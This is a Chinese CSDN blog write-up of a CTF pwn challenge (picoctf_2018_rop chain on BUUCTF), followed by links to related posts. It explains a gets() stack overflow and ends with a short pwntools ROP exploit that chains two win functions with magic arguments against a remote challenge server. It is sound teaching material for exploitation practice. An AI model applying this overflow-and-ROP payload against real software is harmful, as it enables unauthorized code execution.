buuctf30 picoctf_2018_rop chain 1

于 2023-11-23 10:38:58 发布
阅读量75 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_74861133/article/details/134570601
版权
文章描述了一种在存在NX保护的环境中,发现并利用栈溢出漏洞构造ROP链的黑客攻击过程,涉及IDA工具分析、payload构建和远程连接exploit。攻击者成功控制了目标程序并获取flag,展示了技术细节和攻击步骤。
摘要由CSDN通过智能技术生成

1checksec

在这里插入图片描述
只开启了NX保护

2.ida

在这里插入图片描述
发现vuln()函数,点进去查看
在这里插入图片描述
gets()函数存在栈溢出漏洞,可构造ROP链
shift+f12查看字符串,发现flag.text
在这里插入图片描述
双击小箭头
在这里插入图片描述
按tab进行反汇编得到下图
在这里插入图片描述
观察程序,发现s中含有flag.text的前48位,含有完整的flag
而只要满足条件win1=1,win2=1,a1=0xDEADBAAD即可输出flag
而win_function1()函数可将win1赋值为1
在这里插入图片描述

查看win_function2()可知只要win1为1且a1为0xBAAAAAAD就可使win2为1
在这里插入图片描述

exp

from pwn import*
p=remote('node4.buuoj.cn',27619)
payload=b'a'*0x1c+p32(0x80485CB)+p32(0x80485D8)+p32(0x804862B)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()
曾经满眼皆是她
关注
BUUCTFpicoctf_2018_rop chain(write up)
qq_44768749的博客
08-26 1309
BUUCTFpicoctf_2018_rop chain0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp关键代码说明 0x01 文件分析 32位程序,开启了栈不可执行、部分RELRO保护 0x02 运行 输入一串字符串,根据题名也知道需要构造ROP 0x03 IDA 主函数 vuln函数 漏洞点:没有限制输入字符串长度 flag函数 win_function1函数 win_function2函数 0x04 思路 flag函数为后门函数
CTF-PWN-buuctf-not_the_same_3dsctf_2016-ROP函数返回到指定位置和ROP-chain的典型使用
serfend's blog
04-20 1516
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:链接:https://pan.baidu.com/s/1Wll80yDkRvz5XMW_xIZRNQ?pwd=uye9 提取码:uye9 答案:flag{c264d02e-6de6-4164-82a6-bdcb6c8ba64f} 总体思路 发现题目存在溢出点,并且给了flag相关的函数 但是此题是静态编译的,有很多其他不必要的函数,可以尝试直接使用ROP-chain方法get-shell 详细步骤 查看文件信
PicoCTF_2018_rop_chain
m0sway的博客
11-24 658
PicoCTF_2018_rop_chain 使用checksec查看: 只开启了栈不可执行,放入IDA中查看: 主函数中直接给出了漏洞函数,跟进查看: 很明显gets()函数存在一个栈溢出,距离ebp0x18 查看发现存在flag.txt字符串,跟进可以发现函数falg,: 将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 找到win1赋值的函数: 发现win1已经被赋值1,可以不用管, 接着看wi
picoctf_2018_rop_chain
z1r0的博客
12-09 265
picoctf_2018_rop_chain 查看保护 有溢出。 发现了一个flag函数,只需要满足win1不为0和win2不为0和a1=0xdeadbaad即可get flag。 又发现了两个函数,分析一下即可知道是设置win1和win2值的函数 rop的话先放win1这个函数,接着放win2这个函数,win2有参数,满足a1=0xbaaaaad就行。 最后win1和win2都不为0之后flag这个函数有一个a1参数,让a1参数过一下if就行。 构造rop的话注意一下32位的调用:调用函数地址-
BUUCTF pwn——picoctf_2018_rop chain
CNS-Enterprise BCC-1701-J
04-26 593
BUUCTF 做题练习
picoctf_2018_rop chain
个人笔记
04-04 129
3,发现flag.txt被打开,但是要满足条件2的三个&关系才能被打印出来,win1和win2都有对应函数赋值。win2函数的a1未-1163220307,需要控制。win1直接赋值1,不需要控制参数。到ret偏移= 0x18+0x4。
rop-sample.rar_.comrop_rop_rop源码下载_taobao netty
09-20
ROP技术解析与Netty应用实战》 ROP(Return-Oriented Programming,返回导向编程)是一种高级的利用技术,常用于安全领域,特别是在软件漏洞利用中。ROP允许攻击者通过跳转到现有代码片段(通常称为“gadgets”)...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5914
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
[BUUCTF]PWN——picoctf_2018_rop chain
mcmuyanga的博客
11-04 1042
picoctf_2018_rop chain 附件 步骤: 例行检查,32位,开启了NX保护 试运行一下程序,看到输入太长数据会崩溃 32位ida载入,习惯性的检索程序里的字符串,看见了flag.txt,双击跟进 看到程序将flag读入到了参数s里面,满足条件win1&&win2 &&a1==-59039827的条件,就能读出flag 从main函数开始看程序 vuln()函数 gets函数输入,没有限制读入长度,存在溢出漏洞,覆盖ret为flag函数地址,之后想
PicoCTF-2019-WirteUp
Zichel77的博客
11-25 1430
1. 2Warm-General Skills 直接将十进制转化为二进制 picoCTF{101010} 2. Insp3ct0r-Web Exploitation https://2019shell1.picoctf.com/problem/63975/ 点击链接看到如下页面 点击What没有变化,点击How出现如下页面 说明是分别从HTML,CS...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8503
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
【水果识别】基于matlab GUI形态学水果大小识别【含Matlab源码 920期】.md
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
【瑕疵检测】基于matlab瓶盖瑕疵检测【含Matlab源码 730期】.md
最新发布
10-15
CSDN Matlab武动乾坤上传的资料均有对应的代码,代码均可运行,亲测可用,适合小白; 1、代码压缩包内容 主函数:main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开main.m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博客文章底部QQ名片; 4.1 博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 图像识别:表盘识别、车道线识别、车牌识别、答题卡识别、电器识别、跌倒检测、动物识别、发票识别、服装识别、汉字识别、红绿灯识别、火灾检测、疾病分类、交通标志牌识别、口罩识别、裂缝识别、目标跟踪、疲劳检测、身份证识别、人民币识别、数字字母识别、手势识别、树叶识别、水果分级、条形码识别、瑕疵检测、芯片识别、指纹识别
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
10-15
Shapely-1.6.4.post2-cp35-cp35m-win_amd64.whl
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值